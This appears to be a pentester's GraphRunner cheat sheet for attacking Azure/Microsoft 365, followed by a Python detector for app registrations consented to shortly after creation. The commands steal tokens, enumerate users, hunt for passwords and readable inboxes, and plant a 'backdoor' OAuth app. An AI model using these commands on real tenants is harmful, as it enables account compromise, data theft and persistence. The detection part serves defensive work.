# GraphRunner

Awesome tool for enumerating/attacking Azure. This page has some practical attacks. And this blog had some nice tips as well. I also enjoyed this presentation. Also I just saw this GraphRunner cheatsheet updated in August of 2025!

# Authenticate

Get-GraphTokens

# Get your tenantid

Get-TenantID -Domain yourdomain.com

# Grab access token to clipboard

$tokens | Select-Object -ExpandProperty access_token | Set-Clipboard

# Enumerate ALL the permissions

Invoke-BruteClientIDAccess -domain example.com -refreshToken $tokens.refresh_token

# Run the kitchen sink and GraphRun all the things!

Invoke-GraphRunner -Tokens $tokens

# Run with specific tests disabled

Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams

# Dump conditional access policies

Invoke-DumpCAPS -Tokens $tokens -ResolveGuids

# Get users with the word "password" in their descriptions

Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

# Get ALL users

Get-AzureADUsers -Tokens $tokens -OutFile users.txt

# See if you can read any inboxes of those users

Invoke-GraphOpenInboxFinder -tokens $tokens -userlist .\users.txt

# Get groups / updatable groups / dynamic groups

Get-SecurityGroups -Tokens $tokens -OutputFile groups.txt
Get-UpdatableGroups -Tokens $tokens
Get-DynamicGroups -Tokens $tokens

# Get SharePoint URLs

Get-SharePointSiteURLs -Tokens $tokens

# Find interesting SharePoint/OneDrive files

For example, those containing the word "password":

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password" -OutFile sharepoint-password-search

# "Inject" a trustworthy app for persistence

Invoke-InjectOAuthApp -AppName "Test App September 2025" -ReplyUrl "http://testing123" -scope "op backdoor" -Tokens $tokens
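
On the detection side, registering an app and then consenting to it shows up in the Entra ID audit log as "Add application" followed by "Consent to application". The following is an added example (not from GraphRunner or this page's author) that correlates the two in exported audit records; the sample records, the simplified `newValue` text and the 30-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

ADD, CONSENT = "Add application", "Consent to application"  # audit activity names

def _ts(rec):
    return datetime.fromisoformat(rec["activityDateTime"].replace("Z", "+00:00"))

def _key(rec):
    user = ((rec.get("initiatedBy") or {}).get("user") or {}).get("userPrincipalName")
    return user, (rec.get("targetResources") or [{}])[0].get("displayName")

def _scopes(rec):
    """Delegated scopes listed in the ConsentAction.Permissions property."""
    found = set()
    for target in rec.get("targetResources") or []:
        for prop in target.get("modifiedProperties") or []:
            if prop.get("displayName") == "ConsentAction.Permissions":
                for m in re.finditer(r"Scope:\s*([^,\]]+)", prop.get("newValue") or ""):
                    found.update(m.group(1).split())
    return found

def find_register_then_consent(records, window=timedelta(minutes=30)):
    """Flag apps registered and consented to by the same user within `window`."""
    created, alerts = {}, []
    for rec in sorted(records, key=_ts):
        key, activity = _key(rec), rec.get("activityDisplayName")
        if key[0] is None:
            continue  # initiated by an app or service principal, not a user
        if activity == ADD:
            created[key] = _ts(rec)
        elif activity == CONSENT and key in created and _ts(rec) - created[key] <= window:
            alerts.append({"user": key[0], "app": key[1], "scopes": sorted(_scopes(rec))})
    return alerts

# Constructed sample records, trimmed to the fields read above (simplified newValue).
def _rec(when, activity, upn, app, scopes=""):
    perms = f"[] => [[ConsentType: Principal, Scope: {scopes}, CreatedDateTime: ]]"
    prop = {"displayName": "ConsentAction.Permissions", "newValue": perms}
    return {"activityDateTime": when, "activityDisplayName": activity,
            "initiatedBy": {"user": {"userPrincipalName": upn}},
            "targetResources": [{"displayName": app, "modifiedProperties": [prop] if scopes else []}]}

SAMPLE = [
    _rec("2025-09-01T10:04:00Z", CONSENT, "alice@example.com", "Demo App A", "openid Mail.Read"),
    _rec("2025-09-01T10:00:00Z", ADD, "alice@example.com", "Demo App A"),
    _rec("2025-09-01T09:00:00Z", ADD, "bob@example.com", "Demo App B"),
    _rec("2025-09-01T09:10:00Z", CONSENT, "carol@example.com", "Demo App B", "User.Read"),
]
```

`find_register_then_consent(SAMPLE)` flags only Demo App A, where the same user registered the app and consented four minutes later; Demo App B was consented to by a different account and is not flagged.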